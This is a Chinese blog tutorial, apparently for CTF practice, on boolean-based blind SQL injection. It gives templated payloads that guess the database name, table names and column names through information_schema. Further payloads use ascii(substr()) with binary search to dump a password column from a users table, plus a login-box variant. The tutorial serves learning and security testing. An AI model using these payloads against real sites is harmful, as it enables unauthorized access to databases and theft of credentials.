SQL注入——盲注

最新推荐文章于 2024-06-19 13:35:01 发布
最新推荐文章于 2024-06-19 13:35:01 发布
阅读量270 收藏 1
点赞数 3
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46148324/article/details/104739749
版权

盲注的原理

前言

盲注是sql注入的一种,主要用于没有显示位的注入,页面像一个机器人一样不报错代表yes,没有任何显示代表no,我们可以根据yes和no来判断数据库的名字,表名,列明以及字段。

首先第一步还是判断闭合符

我们输入 1' 后发现页面为空
在这里插入图片描述
我们在1'后面加上--+,发现页面恢复正常
在这里插入图片描述

猜库名

我们知道了闭合符号后,即可进行一些sql语句的注入猜得库名。
先通过 1' and (lenth(database())>1)--+ 可以修改后面1的值来判断库名的长度。
在这里插入图片描述
经过一番尝试得出长度为8
通过ascii码猜解库名:

1' and (ascii(substr(database(),{1},1))>{97})--+(中括号不带入代码)

通过改变第一个中括号中的1的值来按顺序判断库名的英文字母
通过改变后面中括号中97的值并用二分法来判断该位置下字母的ASCII码的值,从而得到该位置的英文字母,最后得出数据库的名字。

猜数据表名

1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {0},1),{1},1)))>{101} --+(中括号不带入代码)

方法与猜库名基本一致,通过修改中括号中的内容进行判断。
值得注意的是有许多数据表通过修改limit中括号里的0来判断其他表名,从而找到我们需要查找的表名。

猜列名

1' and (ascii(substr((select column_name from information_schema.columns where table_name='{users}' limit {0},1),{1},1)))>{100} --+(中括号不带入代码)

代码中的中括号又多了一个变量,那就是表名,users可以改变成我们想要查询的数据库,其他中括号里的变量用法和上面一致。

爆字段

1' and (ascii(substr(( select {password} from {users} limit {0},1),{1},1)))>{1}--+

可能有新的朋友早就发现了,手注的话真的是一年一道题,也看不到这里了吧,我不是坑各位,而是我真的被各种工具坑,等我学会了各种工具的详细用法再来写吧,况且其他大佬的博客都有用法,我个菜鸡还是先慢慢摸索工具吧,还有就是脚本,等我会写了以后多给大家一些脚本福利,本文只是盲注最简单的基础,遇到大部分题要记得随机应变,先找到网页回答你的yes或no的方法,再进行语句的注入,
比如给一个登录框你通过万能密码进入后提示flag再数据库中,这很正常,我们就可以吧是否登录成功作为yes或no来进行sal盲注
1" or (lenth(database())>1)--+or后面直接跟盲注语句就好了,切记随机应变。
在这里插入图片描述

沉迷二进制
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入2——盲注(重学)
qq_52263650的博客
11-07 3781
SQL注入2——布尔型盲注(重学)
SQL注入(盲注)
a12332251的博客
12-07 926
SQL
sql注入盲注
最新发布
weixin_64815500的博客
06-19 960
sql注入关于无回显用到的盲注sqli-labs靶场为例子讲解常用盲注类型以及函数。面试或者打ctf可用作参考
SQL注入盲注
xiao_he0123的博客
03-20 6997
SQL注入盲注前言一、盲注分类二、具体解析1.基于布尔的sql盲注首先要先了解一下sql注入截取字符串常用的函数:(1)mid()函数(2)substr()函数(3)left()函数具体注入方法2.基于时间的SQL盲注3.基于报错的SQL盲注1.extractvalue()函数2.uodatexml()函数3.floor()函数 前言 何为盲注盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面 一、盲注分类 盲注分为三类: (1)基于布尔的SQL盲注 (2)基于事
SQL盲注(原理概述、分类)
热门推荐
小赵同学的博客
12-29 2万+
盲注原理 盲注的分类 盲注常用函数 盲注的利用方法 一、SQL盲注概述 1.如果数据库运行返回结果时只反馈对错不会返回数据库中的信息 此时可以采用逻辑判断是否正确的盲注来获取信息。 2.盲注是不能通过直接显示的途径来获取数据库数据的方法。 盲注可以分为三类: 布尔盲注 时间盲注 报错型盲注 1、布尔盲注 盲注查询是不需要返回结果的,仅判断语句是否正常执行即可,所以其返回可以看到一个布尔值,正常显示为true,报错或者是其他不正常显示为False 查询语句: SELECT userid FROM ne
SQL注入-盲注
m0_72125469的博客
11-24 252
SQL注入系列-盲注
SQL注入盲注(小白的学习)
lgsyydsa的博客
06-04 576
对length列从小到大或者从大到小排列,会发现有一些结果的长度与大部分的长度不同,如果还是不知道可以在下面response的render中会有图显示。所以我们可以通过修改substr中第二个参数来进行判断,但是这样会浪费大量的时间。注意:limit 0,1 表示是第一张表,如果爆出来的表不太像有flag的,可以修改limit 第一个参数,继续爆下一个表名。第一个参数由于不知道表名长度,可以设置为10,第二个参数设置同上,爆破完后将长度进行排序可知表名为flag,这很ctfhub。所以先判断数据库的长度。
MySQL盲注
xu_1234567的博客
09-25 400
1.MySQL盲注入原理 MySQL盲注入是在网址追加MySQL IF查询判断语句,通过网页输出来准确判断出ASCII码的值,拿到ASCII码后得到数据库名 2.MySQL函数 在进行MySQL盲注入,的使用以下MySQL函数 database() 查看数据库名 substr(str,1,4) 字符串截取 mid(str,1,4) 字符串截取 ascii码 if (条件,True,False) database() substr(str,1,4) if(条件,1,0) 3.注入测试 ...
SQL盲注
weixin_59872639的博客
02-18 2441
盲注SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。 在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同)。一般情况下,盲注可分为两类: 基于布尔的盲注(Boolean based) 基于时间的盲注(Time based) 基于布尔的盲注 某些场合下,页面返回的结果只有两种(正常或错误) 。通过构造SQL判断语句,查看页面的返回结果(True or False)来判断哪些S
SQL注入--盲注入(time型)
liukenn的博客
07-30 5898
注:看这篇文章之前请先看上一篇文章 一个带GET参数的网站,并且不过对错都返回相同的页面! http://127.0.0.1/index.php?id=1 http://127.0.0.1/index.php?id=1' 由于对错返回的页面一样,无法通过页面判断对错,就使用页面刷新时间来判断对错; 具体情况请了解SQL的 if(SQL语句,sleep(
SQL注入技巧-盲注暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的盲注技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
sql注入---盲注
qq_39993791的博客
01-08 542
盲注入 DVWA测试一: Security:low 判断注入点为字符型注入 1' and (length(database()))=4 – a 得到数据库表长度为4 第一个字节为d,剩下的以此类推 DVWA测试二: Security:medium 由于没有输入信息只有提交,所以需要工具辅助,打开BP进行抓包 判断到注入点为整型注入 得...
SQL注入盲注利用方法
小白渣的博客
02-27 1896
靠 真大佬写的 太太太qiang 辽 !!! 前言 最近做了些基于布尔盲注和基于时间盲注的CTF题,掌握了CTF题中SQL盲注的三种解法,收获很大,于是结合题目分享一下。 BASE-Blind-Inject 题目信息 题干分析 第一次走进误区,刚看到这道题的时候看到了登录框,第一印象应该就是简单的闭合注入,测试后发现是双引号闭合,所以构造payload注入 " or 1=1# 果...
sql盲注
weixin_44720762的博客
04-14 6721
在这篇博客中我尝试着去学习和简单的介绍盲注。 那在开始之前,当然要简单的介绍一下什么是盲注。 之前我们有了解过,根据我们构造的payload的不同,后台数据库会返回错误提示,这给构造闭合语句的人提供了便利,但事实上,编写程序的安全人员并不会不知道这一点。为了解决这一安全问题,除了在后台设置相应的语句判断机制外,不提供对应的错误返回提示,或无论在什么情况下都提供相同的错误返回提示确实是一种降低渗透...
mysql盲注ascii_关于sql盲注语法
weixin_39884832的博客
02-28 280
如果页面没有显错数字,则用盲注语法根据页面变化来判断数据内容获取数据长度:and (select top 1 len(列名) from 表名)>5and (select top 1 len(password) from admin)>16//错误and (select top 1 len(password) from admin)>15//正常获取指定位数的数据:and (sel...
SQL报错型盲注教程(原理全剖析)
Pz_mstr's Blog
08-21 1万+
深入分析基于报错的sql盲注原理,解密“公式”的奥秘
浅谈盲注中的基于时间型和布尔型的注入方法
pygain的博客
11-08 2万+
SQL显错注入已经被用烂了像这种漏洞,漏洞批量发现工具找一找,sqlmap跑一跑。 今天讲的是在我们的命令被带入数据库查询语句但是却什么都没有返回的情况我们该怎么办。例如应用程序就会返回一个“通用的”的页面,或者重定向一个通用页面(可能为网站首页)。这时,我们之前学习的SQL注入办法就无法使用了。 盲注,即在SQL注入过程中,SQL语句执行选择后,选择的数据不能回显到前端,我们需要使用一些特殊的方法进行判断或尝试,这个过程称为盲注
初识SQL盲注
qq_43592364的博客
09-17 2257
SQL盲注 VS 普通SQL注入: 普通SQL注入 SQL盲注 1.执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等 2.一般在页面上直接就会显示执行sql语句的结果 1.一般情况,执行SQL盲注,服务器不会直接返回具体的数据库错误or语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的盲注) 2.一般在...
SQL 注入-盲注
Cwillchris的博客
06-04 311
超详细盲注原理讲解

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值